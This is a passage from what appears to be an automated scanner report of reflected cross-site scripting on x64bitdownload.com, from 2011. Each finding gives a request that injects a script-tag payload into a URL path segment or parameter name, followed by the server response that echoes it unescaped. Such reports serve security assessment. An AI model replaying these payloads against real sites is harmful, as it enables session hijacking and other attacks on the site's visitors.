<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed"/>
...[SNIP]...

1.267. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967ee"><script>alert(1)</script>71fe059bb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1"/>
...[SNIP]...

1.268. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3467"><script>alert(1)</script>d05bfef14e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html" />
...[SNIP]...

1.269. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b74d"><script>alert(1)</script>2f39237061 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061"/>
...[SNIP]...

1.270. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a56"><script>alert(1)</script>621f1f0b522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1"/>
...[SNIP]...

1.271. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4614"><script>alert(1)</script>35e4d9d2a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html" />
...[SNIP]...

1.272. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72b"><script>alert(1)</script>775e881c02c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c"/>
...[SNIP]...

1.273. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c708f"><script>alert(1)</script>5f593c9e2bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1"/>
...[SNIP]...

1.274. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b9e"><script>alert(1)</script>b57549acbe3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html" />
...[SNIP]...

1.275. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e04"><script>alert(1)</script>80ff2e869b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2"/>
...[SNIP]...

1.276. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b65e"><script>alert(1)</script>1c166d61bb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1"/>
...[SNIP]...

1.277. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18719"><script>alert(1)</script>ee7861559ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html" />
...[SNIP]...

1.278. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f95"><script>alert(1)</script>c335ecb6c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b"/>
...[SNIP]...

1.279. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec64"><script>alert(1)</script>d5da7e23d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1"/>
...[SNIP]...

1.280. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39331"><script>alert(1)</script>831ea6de695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html" />
...[SNIP]...

1.281. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b2f"><script>alert(1)</script>30e728f96c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4"/>
...[SNIP]...

1.282. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65876"><script>alert(1)</script>0527961b680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1"/>
...[SNIP]...

1.283. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85299"><script>alert(1)</script>d551f5477b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html" />
...[SNIP]...

1.284. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75347"><script>alert(1)</script>3f02c20ef7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

